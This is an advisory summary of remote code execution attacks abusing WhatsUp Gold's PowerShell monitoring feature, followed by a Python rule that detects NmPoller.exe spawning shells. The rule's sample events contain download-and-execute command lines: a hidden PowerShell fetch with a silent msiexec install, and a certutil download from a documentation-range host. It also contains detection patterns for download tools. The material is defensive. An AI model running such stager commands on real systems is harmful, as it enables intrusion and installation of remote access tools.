Protecting Against RCE Attacks Abusing WhatsUp Gold Vulnerabilities
Essential information
- Published
- 18/09/2024 08:29
- Modified
- 18/09/2024 09:00
- Tags
- 2024-09-18, CVE-2024-6670, CVE-2024-6671, atera agent, radmin, remote access tools, splashtop remote, whatsup gold
- Related entities
- 3 vulnerabilities (cve), 8 observables, 8 techniques (mitre), 4 malware
Description
Trend Micro researchers have observed remote code execution attacks against WhatsUp Gold since 30 August 2024 that abuse its Active Monitor PowerShell Script feature. The attacks most likely exploited CVE-2024-6670 and CVE-2024-6671, for which the vendor released patches on 16 August; the incidents began immediately after a proof-of-concept for the vulnerabilities was published, which suggests that some organizations were not able to apply the patches within the roughly two-week window. The attackers used NmPoller.exe, the WhatsUp Gold polling process that runs Active Monitor scripts, to execute PowerShell that downloaded several remote access tools (among them Atera Agent, Radmin and Splashtop Remote, per the tags above) and attempted to establish persistence. Recommended mitigations: place the WhatsUp Gold services behind strict access controls, apply vendor patches without delay, and monitor WhatsUp Gold hosts for suspicious process creation events, in particular NmPoller.exe spawning PowerShell.
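The process-creation monitoring recommended above can be turned into a simple detection rule. The following is an added example and is not code from the advisory or from Trend Micro: it scans process-creation records for the WhatsUp Gold poller (NmPoller.exe) spawning a shell, and raises the severity when the child's command line looks like a download-and-execute stager or uses an encoded command. The event records, hostnames, paths and command lines are constructed for illustration (the 203.0.113.0/24 address is a documentation range), and the download/encoding patterns are heuristics I chose, not indicators from the advisory.

```python
"""Flag NmPoller.exe spawning PowerShell/cmd on WhatsUp Gold hosts.

Added example, not from the original advisory. Events model the fields of a
Sysmon Event ID 1 / Windows 4688 process-creation record; all values are
constructed for illustration.
"""
import re
from dataclasses import dataclass, field

@dataclass
class ProcEvent:
    host: str
    parent_image: str
    image: str
    command_line: str

@dataclass
class Finding:
    host: str
    severity: str
    reasons: list = field(default_factory=list)

POLLER = "nmpoller.exe"                       # WhatsUp Gold poller that runs Active Monitor scripts
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
# Heuristic stager patterns (assumption, not a signature from the advisory).
DOWNLOAD_RE = re.compile(
    r"invoke-webrequest|downloadfile|downloadstring|\biwr\b|\bcurl\b|\bwget\b|bitsadmin|certutil.*-urlcache",
    re.I)
ENCODED_RE = re.compile(r"-(enc|encodedcommand|e)\b", re.I)   # encoded PowerShell command switch

def basename(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def evaluate(event):
    """Return a Finding if NmPoller.exe spawned a shell, else None."""
    if basename(event.parent_image) != POLLER:
        return None
    child = basename(event.image)
    if child not in SHELLS:
        return None
    # Legitimate Active Monitor scripts also run this way, so a bare spawn is
    # only medium confidence; stager-like command lines raise it to high.
    reasons = [f"{POLLER} spawned {child}"]
    severity = "medium"
    if DOWNLOAD_RE.search(event.command_line):
        reasons.append("command line fetches remote content")
        severity = "high"
    if ENCODED_RE.search(event.command_line):
        reasons.append("encoded PowerShell command")
        severity = "high"
    return Finding(event.host, severity, reasons)

def scan(events):
    """Run evaluate() over a batch of events, dropping non-findings."""
    return [f for f in (evaluate(e) for e in events) if f is not None]

# Constructed sample events (not observed telemetry).
WUG_POLLER = r"C:\Program Files (x86)\Ipswitch\WhatsUp\NmPoller.exe"
PS_EXE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    ProcEvent("wug-srv01", WUG_POLLER, PS_EXE,
              'powershell.exe -nop -w hidden -c "Invoke-WebRequest http://203.0.113.10/agent.msi '
              r'-OutFile C:\Windows\Temp\agent.msi; msiexec /i C:\Windows\Temp\agent.msi /qn"'),
    ProcEvent("wug-srv01", WUG_POLLER, PS_EXE,
              r"powershell.exe -ExecutionPolicy Bypass -File C:\ProgramData\Ipswitch\WhatsUp\Scripts\checkdisk.ps1"),
    ProcEvent("wks-17", r"C:\Windows\explorer.exe", PS_EXE, "powershell.exe"),
    ProcEvent("wug-srv01", WUG_POLLER, r"C:\Windows\System32\cmd.exe",
              r"cmd.exe /c certutil -urlcache -split -f http://203.0.113.10/tool.exe C:\Windows\Temp\t.exe"),
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"[{f.severity}] {f.host}: {'; '.join(f.reasons)}")
```

In practice the parent/child pair is the reliable part of this rule: any shell launched by NmPoller.exe deserves a look, and only the scoring heuristics need tuning against the legitimate Active Monitor scripts deployed in your environment.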